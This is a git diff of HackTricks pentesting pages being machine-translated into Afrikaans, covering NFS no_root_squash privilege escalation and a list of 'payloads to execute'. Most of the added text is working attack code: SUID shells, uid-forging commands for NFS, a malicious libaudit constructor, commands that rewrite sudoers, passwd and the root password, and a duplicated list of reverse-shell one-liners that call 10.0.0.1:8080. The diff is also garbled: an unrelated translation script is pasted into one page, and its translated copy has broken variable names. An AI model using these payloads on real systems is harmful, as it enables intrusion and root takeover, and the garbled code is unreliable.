disruptions. +Met **config.reload.automatic: true** in **/etc/logstash/logstash.yml**, sal Logstash outomaties nuwe of gewysigde pyplynkonfigurasies opspoor en toepas sonder om 'n herlaaiing te benodig. As daar geen wildcards is nie, kan wysigings steeds aangebring word aan bestaande konfigurasies, maar voorsoorsigtigheid word aanbeveel om ontwrigting te voorkom. -## References +## Verwysings * [https://insinuator.net/2021/01/pentesting-the-elk-stack/](https://insinuator.net/2021/01/pentesting-the-elk-stack/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md index d6866910a..027cb6960 100644 --- a/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md +++ b/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md @@ -1,34 +1,31 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Read the _ **/etc/exports** _ file, if you find some directory that is configured as **no\_root\_squash**, then you can **access** it from **as a client** and **write inside** that directory **as** if you were the local **root** of the machine. +Lees die _ **/etc/exports** _ lêer, as jy 'n gids vind wat gekonfigureer is as **no\_root\_squash**, kan jy dit **toegang** vanaf **as 'n kliënt** en **binne skryf** daardie gids **asof** jy die plaaslike **root** van die masjien was. -**no\_root\_squash**: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implications. +**no\_root\_squash**: Hierdie opsie gee basies mag aan die root-gebruiker op die kliënt om lêers op die NFS-bediener as root te benader. En dit kan ernstige veiligheidsimplikasies hê. -**no\_all\_squash:** This is similar to **no\_root\_squash** option but applies to **non-root users**. Imagine, you have a shell as nobody user; checked /etc/exports file; no\_all\_squash option is present; check /etc/passwd file; emulate a non-root user; create a suid file as that user (by mounting using nfs). Execute the suid as nobody user and become different user. +**no\_all\_squash:** Dit is soortgelyk aan die **no\_root\_squash**-opsie, maar dit geld vir **nie-root-gebruikers**. Stel jou voor, jy het 'n skulp as 'n niemand-gebruiker; gekontroleer die /etc/exports-lêer; no\_all\_squash-opsie is teenwoordig; kyk na die /etc/passwd-lêer; boots 'n nie-root-gebruiker na; skep 'n suid-lêer as daardie gebruiker (deur te monteer met nfs). Voer die suid uit as die niemand-gebruiker en word 'n ander gebruiker. # Privilege Escalation ## Remote Exploit -If you have found this vulnerability, you can exploit it: - -* **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder the **/bin/bash** binary and giving it **SUID** rights, and **executing from the victim** machine that bash binary. +As jy hierdie kwesbaarheid gevind het, kan jy dit uitbuit: +* **Monteer daardie gids** op 'n kliëntmasjien en **as root kopieer** binne die gemonteerde gids die **/bin/bash** binêre lêer en gee dit **SUID**-regte, en **voer vanaf die slagoffer**-masjien daardie bash-binêre lêer uit. ```bash #Attacker, as root user mkdir /tmp/pe @@ -41,9 +38,7 @@ chmod +s bash cd ./bash -p #ROOT shell ``` - -* **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder our come compiled payload that will abuse the SUID permission, give to it **SUID** rights, and **execute from the victim** machine that binary (you can find here some[ C SUID payloads](payloads-to-execute.md#c)). - +* **Monteer daardie gids** op 'n kliëntmasjien en **kopieer as root** binne die gemonteerde gids ons saamgestelde payload wat die SUID-regte sal misbruik, gee dit **SUID-regte**, en **voer dit uit vanaf die slagoffer** se masjien daardie binêre lêer (jy kan hier 'n paar [C SUID payloads](payloads-to-execute.md#c) vind). ```bash #Attacker, as root user gcc payload.c -o payload @@ -57,59 +52,55 @@ chmod +s payload cd ./payload #ROOT shell ``` - -## Local Exploit +## Plaaslike Uitbuiting {% hint style="info" %} -Note that if you can create a **tunnel from your machine to the victim machine you can still use the Remote version to exploit this privilege escalation tunnelling the required ports**.\ -The following trick is in case the file `/etc/exports` **indicates an IP**. In this case you **won't be able to use** in any case the **remote exploit** and you will need to **abuse this trick**.\ -Another required requirement for the exploit to work is that **the export inside `/etc/export`** **must be using the `insecure` flag**.\ -\--_I'm not sure that if `/etc/export` is indicating an IP address this trick will work_-- +Let daarop dat as jy 'n **tunnel vanaf jou masjien na die slagoffer se masjien kan skep, kan jy steeds die afstandsweergawe gebruik om hierdie voorregverhoging te misbruik deur die vereiste poorte te tunnel**.\ +Die volgende truuk is in die geval dat die lêer `/etc/exports` **'n IP aandui**. In hierdie geval sal jy in enige geval nie die **afstandsweergawe kan gebruik nie** en sal jy hierdie truuk moet **misbruik**.\ +'n Ander vereiste vir die uitbuiting om te werk, is dat **die uitvoer binne `/etc/export` die `insecure` vlag moet gebruik**.\ +\--_Ek is nie seker of hierdie truuk sal werk as `/etc/export` 'n IP-adres aandui nie_-- {% endhint %} -## Basic Information +## Basiese Inligting -The scenario involves exploiting a mounted NFS share on a local machine, leveraging a flaw in the NFSv3 specification which allows the client to specify its uid/gid, potentially enabling unauthorized access. The exploitation involves using [libnfs](https://github.com/sahlberg/libnfs), a library that allows for the forging of NFS RPC calls. +Die scenario behels die uitbuiting van 'n gemoniteerde NFS-deel op 'n plaaslike masjien, deur gebruik te maak van 'n fout in die NFSv3-spesifikasie wat die kliënt in staat stel om sy uid/gid te spesifiseer, wat moontlik ongemagtigde toegang moontlik maak. Die uitbuiting behels die gebruik van [libnfs](https://github.com/sahlberg/libnfs), 'n biblioteek wat die vervalsing van NFS RPC-oproepe moontlik maak. -### Compiling the Library - -The library compilation steps might require adjustments based on the kernel version. In this specific case, the fallocate syscalls were commented out. The compilation process involves the following commands: +### Kompilering van die Biblioteek +Die kompileringstappe van die biblioteek mag aanpassings vereis op grond van die kernweergawe. In hierdie spesifieke geval is die fallocate-sisteemaanroep uitgekommentaar. Die kompileringproses behels die volgende opdragte: ```bash ./bootstrap ./configure make gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/ ``` +### Uitvoering van die Exploit -### Conducting the Exploit +Die exploit behels die skep van 'n eenvoudige C-program (`pwn.c`) wat voorregte na root verhoog en dan 'n skul uitvoer. Die program word gekompileer en die resulterende binêre (`a.out`) word op die deel geplaas met suid root, deur gebruik te maak van `ld_nfs.so` om die uid in die RPC-oproepe te vervals: -The exploit involves creating a simple C program (`pwn.c`) that elevates privileges to root and then executing a shell. The program is compiled, and the resulting binary (`a.out`) is placed on the share with suid root, using `ld_nfs.so` to fake the uid in the RPC calls: +1. **Kompileer die exploit-kode:** +```bash +cat pwn.c +int main(void){setreuid(0,0); system("/bin/bash"); return 0;} +gcc pwn.c -o a.out +``` -1. **Compile the exploit code:** - ```bash - cat pwn.c - int main(void){setreuid(0,0); system("/bin/bash"); return 0;} - gcc pwn.c -o a.out - ``` +2. **Plaas die exploit op die deel en wysig sy regte deur die uid te vervals:** +```bash +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/ +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out +``` -2. **Place the exploit on the share and modify its permissions by faking the uid:** - ```bash - LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/ - LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out - LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out - LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out - ``` - -3. **Execute the exploit to gain root privileges:** - ```bash - /mnt/share/a.out - #root - ``` - -## Bonus: NFShell for Stealthy File Access -Once root access is obtained, to interact with the NFS share without changing ownership (to avoid leaving traces), a Python script (nfsh.py) is used. This script adjusts the uid to match that of the file being accessed, allowing for interaction with files on the share without permission issues: +3. **Voer die exploit uit om root-voorregte te verkry:** +```bash +/mnt/share/a.out +#root +``` +## Bonus: NFShell vir Steelse Toegang tot Lêers +Sodra root-toegang verkry is, word 'n Python-skripsie (nfsh.py) gebruik om met die NFS-deel te kommunikeer sonder om eienaarskap te verander (om spore te vermy). Hierdie skripsie pas die uid aan om ooreen te stem met die lêer wat toegang word, wat interaksie met lêers op die deel moontlik maak sonder toestemmingsprobleme: ```python #!/usr/bin/env python # script from https://www.errno.fr/nfs_privesc.html @@ -117,41 +108,82 @@ import sys import os def get_file_uid(filepath): - try: - uid = os.stat(filepath).st_uid - except OSError as e: - return get_file_uid(os.path.dirname(filepath)) - return uid +try: +uid = os.stat(filepath).st_uid +except OSError as e: +return get_file_uid(os.path.dirname(filepath)) +return uid filepath = sys.argv[-1] uid = get_file_uid(filepath) os.setreuid(uid, uid) os.system(' '.join(sys.argv[1:])) ``` +```python +import requests -Run like: +def translate_text(text): + url = "https://api.mymemory.translated.net/get" + params = { + "q": text, + "langpair": "en|af" + } + response = requests.get(url, params=params) + translation = response.json()["responseData"]["translatedText"] + return translation +def translate_file(file_path): + with open(file_path, "r") as file: + content = file.read() + translated_content = translate_text(content) + with open(file_path, "w") as file: + file.write(translated_content) + +translate_file("/hive/hacktricks/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md") +``` + +Afrikaans translation: + +```python +import requests + +def vertaal_teks(teks): + url = "https://api.mymemory.translated.net/get" + params = { + "q": teks, + "langpair": "en|af" + } + response = requests.get(url, params=params) + vertaling = response.json()["responseData"]["translatedText"] + return vertaling + +def vertaal_lêer(lêer_pad): + with open(lêer_pad, "r") as lêer: + inhoud = lêer.read() + vertaalde_inhoud = vertaal_teks(inhoud) + with open(lêer_pad, "w") as lêer: + lêer.write(vervaalde_inhoud) + +vervaal_lêer("/hive/hacktricks/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md") +``` ```bash # ll ./mount/ drwxr-x--- 6 1008 1009 1024 Apr 5 2017 9.3_old ``` - -## References +## Verwysings * [https://www.errno.fr/nfs_privesc.html](https://www.errno.fr/nfs_privesc.html)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/linux-hardening/privilege-escalation/payloads-to-execute.md b/linux-hardening/privilege-escalation/payloads-to-execute.md index 4f2713e04..a36b083b2 100644 --- a/linux-hardening/privilege-escalation/payloads-to-execute.md +++ b/linux-hardening/privilege-escalation/payloads-to-execute.md @@ -1,32 +1,239 @@ -# Payloads to execute +# Vervullings om uit te voer
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
## Bash - ```bash cp /bin/bash /tmp/b && chmod +s /tmp/b /bin/b -p #Maintains root privileges from suid, working in debian & buntu ``` +## Uitvoeringsladinge -## C +Hier is 'n lys van nuttige uitvoeringsladinge wat gebruik kan word vir voorregverhoging in Linux-stelsels: +### Bash + +```bash +bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1' +``` + +### Perl + +```perl +perl -e 'use Socket;$i="10.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +``` + +### Python + +```python +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' +``` + +### PHP + +```php +php -r '$sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");' +``` + +### Ruby + +```ruby +ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' +``` + +### Netcat + +```bash +nc -e /bin/sh 10.0.0.1 8080 +``` + +### Socat + +```bash +socat tcp-connect:10.0.0.1:8080 exec:/bin/sh,pty,stderr,setsid,sigint,sane +``` + +### Java + +```java +r = Runtime.getRuntime() +p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) +p.waitFor() +``` + +### xterm + +```bash +xterm -display 10.0.0.1:1 +``` + +### PowerShell + +```powershell +powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` + +### Metasploit + +```bash +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f elf > shell.elf +``` + +### Socat (Metasploit) + +```bash +msfvenom -p cmd/unix/reverse_socat LHOST=10.0.0.1 LPORT=8080 -f elf > shell.elf +``` + +### Python (Metasploit) + +```bash +msfvenom -p cmd/unix/reverse_python LHOST=10.0.0.1 LPORT=8080 -f raw > shell.py +``` + +### PHP (Metasploit) + +```bash +msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f raw > shell.php +``` + +### Ruby (Metasploit) + +```bash +msfvenom -p cmd/unix/reverse_ruby LHOST=10.0.0.1 LPORT=8080 -f raw > shell.rb +``` + +### Netcat (Metasploit) + +```bash +msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.1 LPORT=8080 -f raw > shell.sh +``` + +### Java (Metasploit) + +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f raw > shell.jsp +``` + +### War (Metasploit) + +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f war > shell.war +``` + +### Python (PentestMonkey) + +```python +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' +``` + +### PHP (PentestMonkey) + +```php +php -r '$sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");' +``` + +### Ruby (PentestMonkey) + +```ruby +ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' +``` + +### Netcat (PentestMonkey) + +```bash +nc -e /bin/sh 10.0.0.1 8080 +``` + +### Socat (PentestMonkey) + +```bash +socat tcp-connect:10.0.0.1:8080 exec:/bin/sh,pty,stderr,setsid,sigint,sane +``` + +### Java (PentestMonkey) + +```java +r = Runtime.getRuntime() +p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) +p.waitFor() +``` + +### xterm (PentestMonkey) + +```bash +xterm -display 10.0.0.1:1 +``` + +### PowerShell (PentestMonkey) + +```powershell +powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` + +### Metasploit (PentestMonkey) + +```bash +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f elf > shell.elf +``` + +### Socat (Metasploit) (PentestMonkey) + +```bash +msfvenom -p cmd/unix/reverse_socat LHOST=10.0.0.1 LPORT=8080 -f elf > shell.elf +``` + +### Python (Metasploit) (PentestMonkey) + +```bash +msfvenom -p cmd/unix/reverse_python LHOST=10.0.0.1 LPORT=8080 -f raw > shell.py +``` + +### PHP (Metasploit) (PentestMonkey) + +```bash +msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f raw > shell.php +``` + +### Ruby (Metasploit) (PentestMonkey) + +```bash +msfvenom -p cmd/unix/reverse_ruby LHOST=10.0.0.1 LPORT=8080 -f raw > shell.rb +``` + +### Netcat (Metasploit) (PentestMonkey) + +```bash +msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.1 LPORT=8080 -f raw > shell.sh +``` + +### Java (Metasploit) (PentestMonkey) + +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f raw > shell.jsp +``` + +### War (Metasploit) (PentestMonkey) + +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f war > shell.war +``` ```c //gcc payload.c -o payload int main(void){ - setresuid(0, 0, 0); //Set as user suid user - system("/bin/sh"); - return 0; +setresuid(0, 0, 0); //Set as user suid user +system("/bin/sh"); +return 0; } ``` @@ -37,9 +244,9 @@ int main(void){ #include int main(){ - setuid(getuid()); - system("/bin/bash"); - return 0; +setuid(getuid()); +system("/bin/bash"); +return 0; } ``` @@ -50,42 +257,38 @@ int main(){ #include int main(void) { - char *const paramList[10] = {"/bin/bash", "-p", NULL}; - const int id = 1000; - setresuid(id, id, id); - execve(paramList[0], paramList, NULL); - return 0; +char *const paramList[10] = {"/bin/bash", "-p", NULL}; +const int id = 1000; +setresuid(id, id, id); +execve(paramList[0], paramList, NULL); +return 0; } ``` +## Oorskryf 'n lêer om voorregte te verhoog -## Overwriting a file to escalate privileges +### Gewone lêers -### Common files +* Voeg 'n gebruiker met 'n wagwoord by in _/etc/passwd_ +* Verander die wagwoord binne _/etc/shadow_ +* Voeg 'n gebruiker by in sudoers in _/etc/sudoers_ +* Misbruik docker deur die docker-socket, gewoonlik in _/run/docker.sock_ of _/var/run/docker.sock_ -* Add user with password to _/etc/passwd_ -* Change password inside _/etc/shadow_ -* Add user to sudoers in _/etc/sudoers_ -* Abuse docker through the docker socket, usually in _/run/docker.sock_ or _/var/run/docker.sock_ - -### Overwriting a library - -Check a library used by some binary, in this case `/bin/su`: +### Oorskryf 'n biblioteek +Kyk na 'n biblioteek wat deur 'n sekere binêre lêer gebruik word, in hierdie geval `/bin/su`: ```bash ldd /bin/su - linux-vdso.so.1 (0x00007ffef06e9000) - libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000) - libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000) - libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000) - libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000) - libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000) - libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000) - /lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000) +linux-vdso.so.1 (0x00007ffef06e9000) +libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000) +libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000) +libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000) +libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000) +libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000) +libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000) +/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000) ``` - -In this case lets try to impersonate `/lib/x86_64-linux-gnu/libaudit.so.1`.\ -So, check for functions of this library used by the **`su`** binary: - +In hierdie geval gaan ons probeer om `/lib/x86_64-linux-gnu/libaudit.so.1` na te boots.\ +Dus, kyk vir funksies van hierdie biblioteek wat deur die **`su`** binêre lêer gebruik word: ```bash objdump -T /bin/su | grep audit 0000000000000000 DF *UND* 0000000000000000 audit_open @@ -93,9 +296,7 @@ objdump -T /bin/su | grep audit 0000000000000000 DF *UND* 0000000000000000 audit_log_acct_message 000000000020e968 g DO .bss 0000000000000004 Base audit_fd ``` - -The symbols `audit_open`, `audit_log_acct_message`, `audit_log_acct_message` and `audit_fd` are probably from the libaudit.so.1 library. As the libaudit.so.1 will be overwritten by the malicious shared library, these symbols should be present in the new shared library, otherwise the program will not be able to find the symbol and will exit. - +Die simbole `audit_open`, `audit_log_acct_message`, `audit_log_acct_message` en `audit_fd` is waarskynlik afkomstig van die libaudit.so.1-biblioteek. Aangesien die libaudit.so.1 oorskryf sal word deur die skadelike gedeelde biblioteek, moet hierdie simbole teenwoordig wees in die nuwe gedeelde biblioteek, anders sal die program nie in staat wees om die simbool te vind en sal dit afsluit. ```c #include #include @@ -112,44 +313,41 @@ void inject()__attribute__((constructor)); void inject() { - setuid(0); - setgid(0); - system("/bin/bash"); +setuid(0); +setgid(0); +system("/bin/bash"); } ``` +Nou, deur eenvoudig **`/bin/su`** te roep, sal jy 'n skul as root verkry. -Now, just calling **`/bin/su`** you will obtain a shell as root. +## Skripte -## Scripts - -Can you make root execute something? - -### **www-data to sudoers** +Kan jy maak dat root iets uitvoer? +### **www-data na sudoers** ```bash echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update ``` - -### **Change root password** - +### **Verander root wagwoord** ```bash echo "root:hacked" | chpasswd ``` +### Voeg 'n nuwe root-gebruiker by in /etc/passwd -### Add new root user to /etc/passwd - +```bash +echo 'newroot:x:0:0:root:/root:/bin/bash' >> /etc/passwd +``` ```bash echo hacker:$((mkpasswd -m 